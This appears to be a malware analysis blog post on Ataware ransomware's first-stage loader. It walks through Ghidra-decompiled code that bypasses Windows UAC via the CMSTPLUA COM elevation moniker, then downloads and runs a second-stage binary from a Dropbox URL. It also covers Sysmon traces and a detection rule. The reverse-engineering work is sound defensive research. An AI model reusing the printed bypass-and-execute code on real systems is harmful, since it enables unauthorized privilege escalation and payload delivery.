UAC bypass analysis (Stage 1) Ataware Ransomware – Part 0x2

About the Newsletter

Join 100+ subscribers who get 0x1 actionable security bit every week.

Ataware Ransomware uses UAC bypass using CMSTPLUA COM interface in ATAPIinit.exe (Stage 1). It was downloaded from Dropbox url when the user opened the malicious Excel and enabled the Macro. For details, please check the previous Excel 4.0 Macro Analysis – Ataware Ransomware Part 1. You may download the ATAPIinit.exe file from ANY.RUN (Md5: 097cc44444c6733bc6b32cb1c4c87ddd).

Ataware Ransomware Overview
Ataware Ransomware Overview

Overview of ATAPIinit.exe (Stage1)

The main purpose is to UAC bypass using CMSTPLUA COM interface and download another binary ATAPIConfiguration.exe (Stage 2) from dropbox url. Then, it executes the downloaded file.

Static Analysis

  • 32bit PE, Compiled using GCC MINGW
  • Nothing interesting in overlay, no resources
  • Compiler timestamp invalid is 1970
  • File contain TLS callback but nothing interesting
UAC bypass
Exeinfo & Strings tool
Strings

Found some interesting strings, if you google “{3E5FC7F9-9A51-4367-9063-A120244FBEC7}” you will find multiple links related to UAC bypass. So, you can guess that malware may be bypassing UAC and downloading something from dropbox. We will check this in detail later using Ghidra.
CLSIDFromString
IIDFromString
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
{6EDD6D74-C007-4E75-B76A-E5740995E24C}
Elevation:Administrator!new:
CoGetObject
wininet.dll
InternetOpenW
WINDOWS
wininet.dll
InternetConnectW
dl.dropboxusercontent.com
HttpOpenRequestW
/s/uzu60whrg1spnyy/ATAPIConfiguration
GET
InternetQueryOptionW
InternetSetOptionW
HttpSendRequestA
TEMP

Ghidra Setup

Import Windows API Ghidra Data Type Archives (winapi_32.gdt) in Data Type manager from github. For more details, check this Youtube Video. Retype Variable will be used frequently to fix decompiled code, so please check this short video.

Analysis steps in Ghidra

After initial Static analysis, we can open this in IDA or Ghidra, whichever you prefer. I will be using Ghidra for this series.
1. Navigate to entry function, then to WinMain address @0x004013dd as shown below

Navigate to WinMain
Navigate to WinMain 0x004013dd

2. We will concentrate on uac_bypass_download_execute (0x40151c) as shown below
WinMain Decompiled Code

3. Start analysing below function @ 0x004017e4
Before any Comment UAC bypass
Before any comment/Retype
uac_bypass_download_execute function

4. After we rename/retype variable/comment this function looks as shown below.
UAC bypass
UAC bypass
uac_bypass_download_execute function

Let’s see what’s going on here, bypassing the UAC using CMSTPLUA COM interface and using The COM Elevation Moniker [4]. Using CoGetObject and CMLuaUtil->lpVtbl->ShellExec to execute the downloaded file. Malware author may have copied this GitHub gist [1] and used this to bypass UAC. I will recommend to look up all the API in MSDN which are used in GitHub gist [1]. This will help in understanding the code better.
CLSIDFromString_addr = (CLSIDFromString *)GetProcAddress(hModule,"CLSIDFromString");
hModule = GetModuleHandleW(L"Ole32.dll");
IIDFromString_addr = (IIDFromString *)GetProcAddress(hModule,"IIDFromString");
/* CLSID of CMSTPLUA Çom object */
HVar1 = (*CLSIDFromString_addr)(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",(LPCLSID)&local_4c);
if ((HVar1 == 0) &&
(HVar1 = (*IIDFromString_addr)(L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}",(LPIID)&local_3c),
HVar1 == 0
/* Interface ID of ICMLuaUtil */)) {
RtlSecureZeroMemory(elevate_string,0x208);
wcscpy(elevate_string,L"Elevation:Administrator!new:");
wcscat(elevate_string,L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");
RtlSecureZeroMemory(&local_74,0x24);
local_74.cbStruct = 0x24;
local_60 = 4;
hModule = GetModuleHandleW(L"Ole32.dll");
CoGetObject_addr = (CoGetObject *)GetProcAddress(hModule,"CoGetObject");
(*CoGetObject_addr)(elevate_string,&local_74,&local_3c,&local_50);
/* file_path points to %temp%ATAPIConfiguration.exe */
download_save_ATAPIConfiguration_exe();
/* execute downloaded file using COM interface which bypass UAC */
(**(code **)(*local_50 + 0x24))(local_50,file_path,0,0,0,5);

5. Analysing below function @ 0x00401a0f

Before any comment/Retype
Before any comment/Retype
download_save_ATAPIConfiguration_exe function

6. After we rename/retype variable/comment, this is how functions look as shown below.
UAC bypass & Download code in Ghidra
UAC bypass & Download code in Ghidra

This function download_save_ATAPIConfiguration_exe download the file from hxxps://dl[.]dropboxusercontent[.]com/s/uzu60whrg1spnyy/ATAPIConfiguration and save it to $temp directory as ATAPIConfiguration.exe. If you see the following API in the function then you can guess it download and save file.
InternetOpenW
InternetConnectW
HttpOpenRequestW
HttpSendRequestA
InternetReadFile
CreateFileW
WriteFile

We have statically analysed uac_bypass_download_execute (@ 0x004017e4) and download_save_ATAPIConfiguration_exe (@ 0x00401a0f) in Ghidra.

Dynamic Analysis

Before executing, setup Sysmon logging and enable UAC in VM. After executing you can see the below ProcessCreate event with Integrity level medium as it is executed with UAC.

Process create event using Sysmon
Process create event using Sysmon
Integrity Level - Medium (UAC enabled)

Then you can see another ProcessCreate of DllHost.exe CommandLine: C:WINDOWSSysWOW64DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} with CMSTPLUA CLSID.
UAC Bypass event using Sysmon
UAC Bypass event using Sysmon
Integrity Level - High (UAC Bypass)

Detection

This CommandLine: C:WINDOWSSysWOW64DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} with the CLSID can be used to detect UAC bypass in our environment [2] [3].

Conclusion

  • Analysed one of the technique which malware author uses for UAC bypass
  • We can guess with high probability that malware author stole this code from gist [1]
  • Other malware like Trickbot uses the same technique [5]

Upcoming part 0x3 we will analyse the ATAPIConfiguration.exe (Stage 2) which uses Parent PID Spoofing.

Thanks for reading. Feel free to connect with me on or LinkedIn for any suggestions or comments.

For more updates and exclusive content, subscribe to our newsletter. Happy Reversing! 😊

Join 100+ subscribers who get 0x1 actionable security bit every week.




2 Comments. Leave new

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.

Related Posts

Sysinternal strings help

Extract strings

turned_in_notPE, Rokrat, Strings
Extracting strings is an important step in malware analysis. In this post we will concentrate on static analysis and learn how we can extract/interpret strings from malware. You can download Rokrat (MD5: b441d9a75c60b222e3c9fd50c0d14c5b) from VirusTotal / VirusBay / ANY.RUN. Why do we…
Read More
keyboard_arrow_up